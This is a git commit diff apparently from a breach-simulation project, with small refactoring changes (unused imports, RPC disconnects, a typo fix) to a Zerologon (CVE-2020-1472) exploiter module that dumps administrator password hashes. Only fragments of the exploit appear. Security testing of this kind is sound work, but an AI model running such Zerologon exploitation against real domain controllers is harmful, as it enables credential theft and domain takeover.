Testing changes

2021-02-12 13:58:19 +05:30 · 2021-02-12 13:58:19 +05:30 · 0866aee2cf
parent 2c2a9eaaae
commit 0866aee2cf
2 changed files with 12 additions and 8 deletions
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
 Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
 """

-import io
 import logging
 import os
-import sys
 from binascii import unhexlify
 from typing import List, Optional

 import impacket
-from impacket.dcerpc.v5 import epm, nrpc, transport
+from impacket.dcerpc.v5 import nrpc
 from impacket.dcerpc.v5.dtypes import NULL

 from common.utils.exploit_enum import ExploitType
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
            LOG.debug("Attempting exploit.")
            _exploited = self._send_exploit_rpc_login_requests(rpc_con)

+            rpc_con.disconnect()
+
        else:
            LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
            _exploited = False
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
        return _exploited

    def is_exploitable(self) -> bool:
-        if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']:
-            return True
+        if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
+            return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
        return self.zerologon_finger.get_host_fingerprint(self.host)

    def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
        # Max attempts = 2000. Expected average number of attempts needed: 256.
+        result_exploit_attempt = None
        for _ in range(0, self.MAX_ATTEMPTS):
            try:
                result_exploit_attempt = self.attempt_exploit(rpc_con)
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
        except Exception as e:
            LOG.error(e)

+        finally:
+            if rpc_con:
+                rpc_con.disconnect()
+
    def get_admin_pwd_hashes(self) -> str:
        try:
            options = OptionsForSecretsdump(
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
            except Exception as e:
                LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")

-    def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]:
+    def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
        # Max attempts = 2000. Expected average number of attempts needed: 256.
+        result_restoration_attempt = None
        for _ in range(0, self.MAX_ATTEMPTS):
            try:
                result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
--- a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
@ -1,7 +1,5 @@
-import io
 import logging
 import os
-import sys
 import traceback

 from impacket.examples.secretsdump import (LocalOperations, LSASecrets,